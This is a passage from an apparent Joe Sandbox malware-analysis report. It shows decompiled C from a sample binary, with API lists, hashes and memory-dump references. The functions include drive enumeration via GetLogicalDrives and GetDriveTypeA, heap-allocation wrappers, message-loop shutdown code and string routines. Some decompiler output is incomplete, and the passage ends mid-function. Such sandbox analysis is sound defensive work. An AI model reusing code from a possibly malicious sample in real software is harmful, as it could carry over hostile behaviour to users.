                                                                                    					_t40 = PathFileExistsA( >=  ? _v84 :  &_v84);
                                                                                    					_t72 = _t40;
                                                                                    					SetErrorMode(_t39);
                                                                                    					if(_t40 != 0) {
                                                                                    						_t44 =  >=  ? _v76 :  &_v76;
                                                                                    						_t45 = GetDriveTypeA( >=  ? _v76 :  &_v76);
                                                                                    						if(_t45 >= 2 && (_t45 <= 4 || _t45 == 6)) {
                                                                                    							_t77 = _t76 - 0x18;
                                                                                    							_v89 = 0;
                                                                                    							_t63 = _t77;
                                                                                    							_push(0xffffffff);
                                                                                    							 *((intOrPtr*)(_t63 + 0x14)) = 0xf;
                                                                                    							 *((intOrPtr*)(_t63 + 0x10)) = 0;
                                                                                    							 *_t63 = 0;
                                                                                    							E00413FF0(_t52, _t63,  &_v76, 0);
                                                                                    							_t48 = E00412900( &_v64, _v101);
                                                                                    							_t76 = _t77 + 0x18;
                                                                                    							_v28 = 1;
                                                                                    							E00413580(_t52, _v96, _t48);
                                                                                    							if(_v48 >= 8) {
                                                                                    								L00422587(_v56);
                                                                                    								_t76 = _t76 + 4;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					_v16 = 0xffffffff;
                                                                                    					if(_v56 >= 0x10) {
                                                                                    						L00422587(_v76);
                                                                                    						_t76 = _t76 + 4;
                                                                                    					}
                                                                                    					_t35 = _v88;
                                                                                    					L11:
                                                                                    					_t52 = _t52 + 1;
                                                                                    				} while (_t52 < 0x1a);
                                                                                    				 *[fs:0x0] = _v16;
                                                                                    				return _t35;
                                                                                    			}

                                                                                    APIs
                                                                                    • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                    • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                    • String ID:
                                                                                    • API String ID: 2560635915-0
                                                                                    • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                    • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                    • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                    • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 96%
                                                                                    			E0043B6FF(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                                                    				void* _t7;
                                                                                    				long _t8;
                                                                                    				intOrPtr* _t9;
                                                                                    				intOrPtr* _t12;
                                                                                    				long _t20;
                                                                                    				long _t31;
                                                                                    
                                                                                    				if(_a4 != 0) {
                                                                                    					_t31 = _a8;
                                                                                    					__eflags = _t31;
                                                                                    					if(_t31 != 0) {
                                                                                    						_push(__ebx);
                                                                                    						while(1) {
                                                                                    							__eflags = _t31 - 0xffffffe0;
                                                                                    							if(_t31 > 0xffffffe0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							__eflags = _t31;
                                                                                    							if(_t31 == 0) {
                                                                                    								_t31 = _t31 + 1;
                                                                                    								__eflags = _t31;
                                                                                    							}
                                                                                    							_t7 = HeapReAlloc( *0x510440, 0, _a4, _t31);
                                                                                    							_t20 = _t7;
                                                                                    							__eflags = _t20;
                                                                                    							if(_t20 != 0) {
                                                                                    								L17:
                                                                                    								_t8 = _t20;
                                                                                    							} else {
                                                                                    								__eflags =  *0x510ab0 - _t7;
                                                                                    								if(__eflags == 0) {
                                                                                    									_t9 = E00425208(__eflags);
                                                                                    									 *_t9 = E00425261(GetLastError());
                                                                                    									goto L17;
                                                                                    								} else {
                                                                                    									__eflags = E0042793D(_t7, _t31);
                                                                                    									if(__eflags == 0) {
                                                                                    										_t12 = E00425208(__eflags);
                                                                                    										 *_t12 = E00425261(GetLastError());
                                                                                    										L12:
                                                                                    										_t8 = 0;
                                                                                    										__eflags = 0;
                                                                                    									} else {
                                                                                    										continue;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							goto L14;
                                                                                    						}
                                                                                    						E0042793D(_t6, _t31);
                                                                                    						 *((intOrPtr*)(E00425208(__eflags))) = 0xc;
                                                                                    						goto L12;
                                                                                    					} else {
                                                                                    						E00420BED(_a4);
                                                                                    						_t8 = 0;
                                                                                    					}
                                                                                    					L14:
                                                                                    					return _t8;
                                                                                    				} else {
                                                                                    					return E00420C62(__ebx, __edx, __edi, _a8);
                                                                                    				}
                                                                                    			}










                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 0043B70B
                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                    • _free.LIBCMT ref: 0043B71E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free_malloc
                                                                                    • String ID:
                                                                                    • API String ID: 1020059152-0
                                                                                    • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                    • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                    • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                    • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0041F070() {
                                                                                    				struct tagMSG _v32;
                                                                                    				long _t7;
                                                                                    
                                                                                    				PostThreadMessageW( *0x51325c, 0x12, 0, 0);
                                                                                    				do {
                                                                                    					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
                                                                                    						DispatchMessageW( &_v32);
                                                                                    					}
                                                                                    					_t7 = WaitForSingleObject( *0x513260, 0xa);
                                                                                    				} while (_t7 == 0x102);
                                                                                    				 *0x513260 = 0;
                                                                                    				 *0x51325c = 0;
                                                                                    				return _t7;
                                                                                    			}






                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 1380987712-0
                                                                                    • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                    • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                    • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                    • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0041E500() {
                                                                                    				struct tagMSG _v32;
                                                                                    				long _t7;
                                                                                    
                                                                                    				PostThreadMessageW( *0x513258, 0x12, 0, 0);
                                                                                    				do {
                                                                                    					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
                                                                                    						DispatchMessageW( &_v32);
                                                                                    					}
                                                                                    					_t7 = WaitForSingleObject( *0x513254, 0xa);
                                                                                    				} while (_t7 == 0x102);
                                                                                    				 *0x513254 = 0;
                                                                                    				 *0x513258 = 0;
                                                                                    				return _t7;
                                                                                    			}






                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 1380987712-0
                                                                                    • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                    • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                    • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                    • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0041FA40(long* __ecx) {
                                                                                    				struct tagMSG _v32;
                                                                                    				long _t9;
                                                                                    				struct HWND__** _t14;
                                                                                    
                                                                                    				_t14 = __ecx;
                                                                                    				PostThreadMessageW( *__ecx, 0x12, 0, 0);
                                                                                    				do {
                                                                                    					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
                                                                                    						DispatchMessageW( &_v32);
                                                                                    					}
                                                                                    					_t9 = WaitForSingleObject(_t14[1], 0xa);
                                                                                    				} while (_t9 == 0x102);
                                                                                    				_t14[1] = 0;
                                                                                    				 *_t14 = 0;
                                                                                    				return _t9;
                                                                                    			}







                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32 ref: 0041FA53
                                                                                    • PeekMessageW.USER32 ref: 0041FA71
                                                                                    • DispatchMessageW.USER32 ref: 0041FA7B
                                                                                    • PeekMessageW.USER32 ref: 0041FA89
                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 1380987712-0
                                                                                    • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                    • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                    • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                    • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0041FDF0(long* __ecx) {
                                                                                    				struct tagMSG _v32;
                                                                                    				long _t9;
                                                                                    				struct HWND__** _t14;
                                                                                    
                                                                                    				_t14 = __ecx;
                                                                                    				PostThreadMessageW( *__ecx, 0x12, 0, 0);
                                                                                    				do {
                                                                                    					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
                                                                                    						DispatchMessageW( &_v32);
                                                                                    					}
                                                                                    					_t9 = WaitForSingleObject(_t14[1], 0xa);
                                                                                    				} while (_t9 == 0x102);
                                                                                    				_t14[1] = 0;
                                                                                    				 *_t14 = 0;
                                                                                    				return _t9;
                                                                                    			}







                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32 ref: 0041FE03
                                                                                    • PeekMessageW.USER32 ref: 0041FE21
                                                                                    • DispatchMessageW.USER32 ref: 0041FE2B
                                                                                    • PeekMessageW.USER32 ref: 0041FE39
                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 1380987712-0
                                                                                    • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                    • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                    • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                    • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 69%
                                                                                    			E00417BA0(signed int __ebx, signed int __ecx, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                                                                                    				signed int _v0;
                                                                                    				signed int _v8;
                                                                                    				signed int _v12;
                                                                                    				signed int _v16;
                                                                                    				intOrPtr _v44;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				signed int _t101;
                                                                                    				signed int _t104;
                                                                                    				signed int _t107;
                                                                                    				signed int _t109;
                                                                                    				signed int _t111;
                                                                                    				signed int _t113;
                                                                                    				signed int _t116;
                                                                                    				intOrPtr _t122;
                                                                                    				intOrPtr _t128;
                                                                                    				intOrPtr* _t136;
                                                                                    				signed int _t137;
                                                                                    				intOrPtr* _t139;
                                                                                    				signed int _t146;
                                                                                    				intOrPtr _t154;
                                                                                    				signed int _t155;
                                                                                    				intOrPtr _t162;
                                                                                    				signed int _t171;
                                                                                    				signed int _t174;
                                                                                    				signed int _t176;
                                                                                    				signed int _t177;
                                                                                    				signed int _t180;
                                                                                    				intOrPtr* _t186;
                                                                                    				signed int _t187;
                                                                                    				signed int _t191;
                                                                                    				intOrPtr _t196;
                                                                                    				signed int _t199;
                                                                                    				signed int _t200;
                                                                                    				intOrPtr _t204;
                                                                                    				signed int _t206;
                                                                                    				intOrPtr* _t207;
                                                                                    				void* _t209;
                                                                                    				signed int _t210;
                                                                                    				intOrPtr* _t211;
                                                                                    				intOrPtr* _t212;
                                                                                    				intOrPtr* _t215;
                                                                                    				void* _t217;
                                                                                    				signed int _t218;
                                                                                    				signed int _t219;
                                                                                    				signed int _t221;
                                                                                    				signed int _t222;
                                                                                    				intOrPtr _t223;
                                                                                    				void* _t224;
                                                                                    				signed int _t233;
                                                                                    				signed int _t238;
                                                                                    				intOrPtr* _t239;
                                                                                    				signed int _t241;
                                                                                    				void* _t250;
                                                                                    				void* _t252;
                                                                                    				void* _t253;
                                                                                    
                                                                                    				_t176 = __ebx;
                                                                                    				_push(__ecx);
                                                                                    				_t206 = _a12;
                                                                                    				_t238 = __ecx;
                                                                                    				_push(_t221);
                                                                                    				if(_t206 == 0) {
                                                                                    					L13:
                                                                                    					_t186 =  *((intOrPtr*)(_t238 + 0x10));
                                                                                    					_t101 = _a4;
                                                                                    					__eflags = _t186 - _t101;
                                                                                    					if(__eflags < 0) {
                                                                                    						_push("invalid string position");
                                                                                    						E0044F26C(__eflags);
                                                                                    						goto L46;
                                                                                    					} else {
                                                                                    						_t233 = _a8;
                                                                                    						_t217 = _t186 - _t101;
                                                                                    						__eflags = _t217 - _t233;
                                                                                    						_push(_t176);
                                                                                    						_t176 = _a16;
                                                                                    						_t221 =  <  ? _t217 : _t233;
                                                                                    						_t186 = _t186 - _t221;
                                                                                    						__eflags = (_t101 | 0xffffffff) - _t176 - _t186;
                                                                                    						if(__eflags <= 0) {
                                                                                    							L46:
                                                                                    							_push("string too long");
                                                                                    							E0044F23E(__eflags);
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							asm("int3");
                                                                                    							_t250 = _t252;
                                                                                    							_t253 = _t252 - 8;
                                                                                    							_push(_t238);
                                                                                    							_push(_t221);
                                                                                    							_t222 = _v12;
                                                                                    							_t239 = _t186;
                                                                                    							__eflags = _t222;
                                                                                    							if(_t222 == 0) {
                                                                                    								L60:
                                                                                    								_t104 =  *(_t239 + 0x10);
                                                                                    								_t187 = _v0;
                                                                                    								__eflags = _t104 - _t187;
                                                                                    								if(__eflags < 0) {
                                                                                    									_push("invalid string position");
                                                                                    									E0044F26C(__eflags);
                                                                                    									goto L91;
                                                                                    								} else {
                                                                                    									_t209 = _t104 - _t187;
                                                                                    									_t187 = _a12;
                                                                                    									_push(_t176);
                                                                                    									_t180 = _a4;
                                                                                    									__eflags = _t209 - _t180;
                                                                                    									_t176 =  <  ? _t209 : _t180;
                                                                                    									_t113 = _t104 - _t176;
                                                                                    									_a4 = _t113;
                                                                                    									__eflags = (_t113 | 0xffffffff) - _t187 - _a4;
                                                                                    									if(__eflags <= 0) {
                                                                                    										L91:
                                                                                    										_push("string too long");
                                                                                    										E0044F23E(__eflags);
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										asm("int3");
                                                                                    										_push(_t250);
                                                                                    										_push(_t176);
                                                                                    										_push(_t239);
                                                                                    										_push(_t222);
                                                                                    										_t223 = _v44;
                                                                                    										__eflags =  *((intOrPtr*)(_t187 + 0x10)) - _t223;
                                                                                    										_t224 =  <  ?  *((void*)(_t187 + 0x10)) : _t223;
                                                                                    										__eflags =  *((intOrPtr*)(_t187 + 0x14)) - 8;
                                                                                    										if( *((intOrPtr*)(_t187 + 0x14)) >= 8) {
                                                                                    											_t187 =  *_t187;
                                                                                    										}
                                                                                    										_t177 = _a8;
                                                                                    										__eflags = _t224 - _t177;
                                                                                    										_t241 =  <  ? _t224 : _t177;
                                                                                    										__eflags = _t241;
                                                                                    										if(_t241 == 0) {
                                                                                    											L98:
                                                                                    											_t107 = 0;
                                                                                    											__eflags = 0;
                                                                                    										} else {
                                                                                    											_t207 = _a4;
                                                                                    											while(1) {
                                                                                    												__eflags =  *_t187 -  *_t207;
                                                                                    												if( *_t187 !=  *_t207) {
                                                                                    													break;
                                                                                    												}
                                                                                    												_t187 = _t187 + 2;
                                                                                    												_t207 = _t207 + 2;
                                                                                    												_t241 = _t241 - 1;
                                                                                    												__eflags = _t241;
                                                                                    												if(_t241 != 0) {
                                                                                    													continue;
                                                                                    												} else {
                                                                                    													goto L98;
                                                                                    												}
                                                                                    												goto L99;
                                                                                    											}
                                                                                    											_t111 =  *_t187 & 0x0000ffff;
                                                                                    											__eflags = _t111 -  *_t207;
                                                                                    											asm("sbb eax, eax");
                                                                                    											_t107 = (_t111 & 0xfffffffe) + 1;
                                                                                    										}
                                                                                    										L99:
                                                                                    										__eflags = _t107;
                                                                                    										if(_t107 != 0) {
                                                                                    											L104:
                                                                                    											return _t107;
                                                                                    										} else {
                                                                                    											__eflags = _t224 - _t177;
                                                                                    											if(_t224 >= _t177) {
                                                                                    												__eflags = _t224 - _t177;
                                                                                    												_t100 = _t224 != _t177;
                                                                                    												__eflags = _t100;
                                                                                    												_t107 = 0 | _t100;
                                                                                    												goto L104;
                                                                                    											} else {
                                                                                    												_t109 = _t107 | 0xffffffff;
                                                                                    												__eflags = _t109;
                                                                                    												return _t109;
                                                                                    											}
                                                                                    										}
                                                                                    									} else {
                                                                                    										_t210 = _t209 - _t176;
                                                                                    										_v16 = _t210;
                                                                                    										__eflags = _t187 - _t176;
                                                                                    										if(_t187 < _t176) {
                                                                                    											_t128 =  *((intOrPtr*)(_t239 + 0x14));
                                                                                    											__eflags = _t128 - 8;
                                                                                    											if(_t128 < 8) {
                                                                                    												_a4 = _t239;
                                                                                    											} else {
                                                                                    												_a4 =  *_t239;
                                                                                    												_t222 = _a8;
                                                                                    											}
                                                                                    											__eflags = _t128 - 8;
                                                                                    											if(_t128 < 8) {
                                                                                    												_v12 = _t239;
                                                                                    											} else {
                                                                                    												_v12 =  *_t239;
                                                                                    											}
                                                                                    											__eflags = _t210;
                                                                                    											if(_t210 != 0) {
                                                                                    												E004205A0(_v12 + (_v0 + _t187) * 2, _a4 + (_v0 + _t176) * 2, _t210 + _t210);
                                                                                    												_t222 = _a8;
                                                                                    												_t253 = _t253 + 0xc;
                                                                                    												_t187 = _a12;
                                                                                    											}
                                                                                    										}
                                                                                    										__eflags = _t187;
                                                                                    										if(_t187 != 0) {
                                                                                    											L73:
                                                                                    											_a4 = _t187 - _t176 +  *(_t239 + 0x10);
                                                                                    											_t116 = E00415D50(_t176, _t239, _t222, _t239, _t187 - _t176 +  *(_t239 + 0x10), 0);
                                                                                    											__eflags = _t116;
                                                                                    											if(_t116 != 0) {
                                                                                    												_t191 = _a12;
                                                                                    												__eflags = _t176 - _t191;
                                                                                    												if(_t176 >= _t191) {
                                                                                    													_t182 = _v0;
                                                                                    												} else {
                                                                                    													_t122 =  *((intOrPtr*)(_t239 + 0x14));
                                                                                    													__eflags = _t122 - 8;
                                                                                    													if(_t122 < 8) {
                                                                                    														_t212 = _t239;
                                                                                    													} else {
                                                                                    														_t212 =  *_t239;
                                                                                    													}
                                                                                    													__eflags = _t122 - 8;
                                                                                    													if(_t122 < 8) {
                                                                                    														_a8 = _t239;
                                                                                    													} else {
                                                                                    														_a8 =  *_t239;
                                                                                    													}
                                                                                    													_t182 = _v0;
                                                                                    													E0040B600(_a8 + (_v0 + _t191) * 2, _t212 + (_v0 + _t176) * 2, _v16);
                                                                                    													_t191 = _a12;
                                                                                    													_t253 = _t253 + 4;
                                                                                    												}
                                                                                    												__eflags =  *((intOrPtr*)(_t239 + 0x14)) - 8;
                                                                                    												if( *((intOrPtr*)(_t239 + 0x14)) < 8) {
                                                                                    													_t211 = _t239;
                                                                                    												} else {
                                                                                    													_t211 =  *_t239;
                                                                                    												}
                                                                                    												__eflags = _t191;
                                                                                    												if(_t191 != 0) {
                                                                                    													E0042D8D0(_t211 + _t182 * 2, _t222, _t191 + _t191);
                                                                                    												}
                                                                                    												E00414DF0(_t239, _a4);
                                                                                    											}
                                                                                    										} else {
                                                                                    											__eflags = _t176;
                                                                                    											if(_t176 != 0) {
                                                                                    												goto L73;
                                                                                    											}
                                                                                    										}
                                                                                    										return _t239;
                                                                                    									}
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t196 =  *((intOrPtr*)(_t239 + 0x14));
                                                                                    								__eflags = _t196 - 8;
                                                                                    								if(_t196 < 8) {
                                                                                    									_t136 = _t239;
                                                                                    								} else {
                                                                                    									_t136 =  *_t239;
                                                                                    								}
                                                                                    								__eflags = _t222 - _t136;
                                                                                    								if(_t222 < _t136) {
                                                                                    									goto L60;
                                                                                    								} else {
                                                                                    									__eflags = _t196 - 8;
                                                                                    									if(_t196 < 8) {
                                                                                    										_t215 = _t239;
                                                                                    									} else {
                                                                                    										_t215 =  *_t239;
                                                                                    									}
                                                                                    									_t137 =  *(_t239 + 0x10);
                                                                                    									__eflags = _t215 + _t137 * 2 - _t222;
                                                                                    									if(_t215 + _t137 * 2 <= _t222) {
                                                                                    										goto L60;
                                                                                    									} else {
                                                                                    										__eflags = _t196 - 8;
                                                                                    										if(_t196 < 8) {
                                                                                    											_t139 = _t239;
                                                                                    										} else {
                                                                                    											_t139 =  *_t239;
                                                                                    										}
                                                                                    										__eflags = _t222 - _t139;
                                                                                    										return E00414920(_t176, _t239, _t222 - _t139 >> 1, _t239, _v0, _a4, _t239, _t222 - _t139 >> 1, _a12);
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						} else {
                                                                                    							_t218 = _t217 - _t221;
                                                                                    							_v8 = _t218;
                                                                                    							__eflags = _t176 - _t221;
                                                                                    							if(_t176 < _t221) {
                                                                                    								_t162 =  *((intOrPtr*)(_t238 + 0x14));
                                                                                    								__eflags = _t162 - 0x10;
                                                                                    								if(_t162 < 0x10) {
                                                                                    									_a8 = _t238;
                                                                                    								} else {
                                                                                    									_a8 =  *_t238;
                                                                                    								}
                                                                                    								__eflags = _t162 - 0x10;
                                                                                    								if(_t162 < 0x10) {
                                                                                    									_a16 = _t238;
                                                                                    								} else {
                                                                                    									_a16 =  *_t238;
                                                                                    								}
                                                                                    								__eflags = _t218;
                                                                                    								if(_t218 != 0) {
                                                                                    									__eflags = _a16 + _a4 + _t176;
                                                                                    									E004205A0(_a16 + _a4 + _t176, _a8 + _a4 + _t221, _t218);
                                                                                    									_t252 = _t252 + 0xc;
                                                                                    								}
                                                                                    							}
                                                                                    							__eflags = _t176;
                                                                                    							if(_t176 != 0) {
                                                                                    								L26:
                                                                                    								_push(0);
                                                                                    								_a16 = _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10));
                                                                                    								_t146 = E00415810(_t176, _t238, _t221, _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10)));
                                                                                    								__eflags = _t146;
                                                                                    								if(_t146 == 0) {
                                                                                    									goto L44;
                                                                                    								} else {
                                                                                    									__eflags = _t221 - _t176;
                                                                                    									if(_t221 < _t176) {
                                                                                    										_t154 =  *((intOrPtr*)(_t238 + 0x14));
                                                                                    										__eflags = _t154 - 0x10;
                                                                                    										if(_t154 < 0x10) {
                                                                                    											_a8 = _t238;
                                                                                    										} else {
                                                                                    											_a8 =  *_t238;
                                                                                    										}
                                                                                    										__eflags = _t154 - 0x10;
                                                                                    										if(_t154 < 0x10) {
                                                                                    											_t219 = _t238;
                                                                                    										} else {
                                                                                    											_t219 =  *_t238;
                                                                                    										}
                                                                                    										_t155 = _v8;
                                                                                    										__eflags = _t155;
                                                                                    										if(_t155 != 0) {
                                                                                    											__eflags = _t219 + _a4 + _t176;
                                                                                    											E004205A0(_t219 + _a4 + _t176, _a8 + _a4 + _t221, _t155);
                                                                                    											_t252 = _t252 + 0xc;
                                                                                    										}
                                                                                    									}
                                                                                    									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
                                                                                    									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
                                                                                    										_t199 = _t238;
                                                                                    									} else {
                                                                                    										_t199 =  *_t238;
                                                                                    									}
                                                                                    									__eflags = _t176;
                                                                                    									if(_t176 != 0) {
                                                                                    										__eflags = _a4 + _t199;
                                                                                    										E0042D8D0(_a4 + _t199, _a12, _t176);
                                                                                    									}
                                                                                    									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
                                                                                    									_t200 = _a16;
                                                                                    									 *((intOrPtr*)(_t238 + 0x10)) = _t200;
                                                                                    									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
                                                                                    										 *((char*)(_t238 + _t200)) = 0;
                                                                                    										goto L44;
                                                                                    									} else {
                                                                                    										 *((char*)( *_t238 + _t200)) = 0;
